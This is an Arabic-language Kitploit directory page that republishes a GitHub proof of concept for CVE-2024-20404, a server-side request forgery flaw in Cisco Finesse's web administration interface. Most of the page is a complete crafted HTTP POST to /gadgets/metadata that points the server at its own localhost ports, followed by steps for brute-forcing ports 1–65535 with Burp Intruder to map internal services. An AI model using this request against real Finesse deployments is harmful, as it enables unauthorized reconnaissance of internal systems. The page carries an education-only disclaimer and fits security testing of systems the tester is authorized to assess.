Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-20404 — إثبات مفهوم لاستغلال CVE-2024-20404 يُظهر ثغرة SSRF في واجهة إدارة Cisco Finesse المستندة إلى الويب لاستكشاف الخدمات المحلية عن طريق إرسال طلبات HTTP مصممة خصيصًا. | Kitploit
أدوات/GitHubGitHub/3zz4t/cve-2024-20404
الاستطلاعتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الويباختبار الاختراق
GitHub3zz4t/cve-2024-20404

CVE-2024-20404

إثبات مفهوم لاستغلال CVE-2024-20404 يُظهر ثغرة SSRF في واجهة إدارة Cisco Finesse المستندة إلى الويب لاستكشاف الخدمات المحلية عن طريق إرسال طلبات HTTP مصممة خصيصًا.

عرض المستودع
214منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

الوصف

يمكن لثغرة أمنية في واجهة الإدارة المستندة إلى الويب لـ Cisco Finesse أن تسمح لمهاجم غير مصادق عن بُعد بتنفيذ هجوم تزوير طلب الخادم (SSRF) على نظام متأثر.

تحدث هذه الثغرة بسبب عدم كفاية التحقق من صحة المدخلات التي يقدمها المستخدم لطلبات HTTP محددة تُرسل إلى النظام المتأثر. يمكن للمهاجم استغلال هذه الثغرة عن طريق إرسال طلب HTTP مخصص إلى الجهاز المتأثر. قد يسمح الاستغلال الناجح للمهاجم بالحصول على معلومات حساسة محدودة للخدمات المرتبطة بالجهاز المتأثر.

إثبات المفهوم (PoC)

  1. أرسل الطلب أدناه للتحقق من الاستجابة من رقم المنفذ "8444" على المضيف المحلي للخادم بعد استبدال <target> الخاص بك.
POST /gadgets/metadata HTTP/2
Host: <target>:8445
Cookie: timeBeforeFailover=1695808242310; timeBeforeAttemptingLoginInIframe=1695808244317; attemptsMade=1; seqNumberGenerated=1; finesse_ag_extension=<extension>; activeDeviceId4000=SEPD4AD717A03F6; timeBeforeLoadingOtherSide=1695808249678
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<target>:8445/desktop/container;jsessionid=90aE172355707490406528141464742B/?locale=en_US
Content-Type: application/json
Content-Length: 127
Origin: https://<target>:8445
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"context":{"container":"default","language":"en","country":"US","locale":"en_US"},"gadgets":[{"url":"http://127.0.0.1:8444"}]}

  1. استخدم أداة Burp Suite Intruder لفحص جميع المنافذ المفتوحة على خادم إدارة Cisco Finesse المستند إلى الويب، عن طريق تغيير رقم المنفذ من 1-65535.

  2. سترى الاستجابة "Connection refused" على المنافذ المغلقة.

  1. تشير رسائل الخطأ الأخرى إلى أن هذه المنافذ مفتوحة ويمكن تعدادها.

المراجع

  • https://nvd.nist.gov/vuln/detail/CVE-2024-20404
  • https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-finesse-ssrf-rfi-Um7wT8Ew

إخلاء مسؤولية

هذا مجرد إثبات مفهوم (PoC) لإظهار أن واجهة إدارة Cisco Finesse المستندة إلى الويب معرضة لثغرة تزوير طلب الخادم (SSRF)، وهذا الإثبات هو لأغراض تعليمية فقط. استخدمه بمسؤولية وفقط على الأنظمة التي لديك إذن صريح لاختبارها. يمكن أن يؤدي سوء استخدام هذا الإثبات إلى عواقب وخيمة.

تنزيل الأداة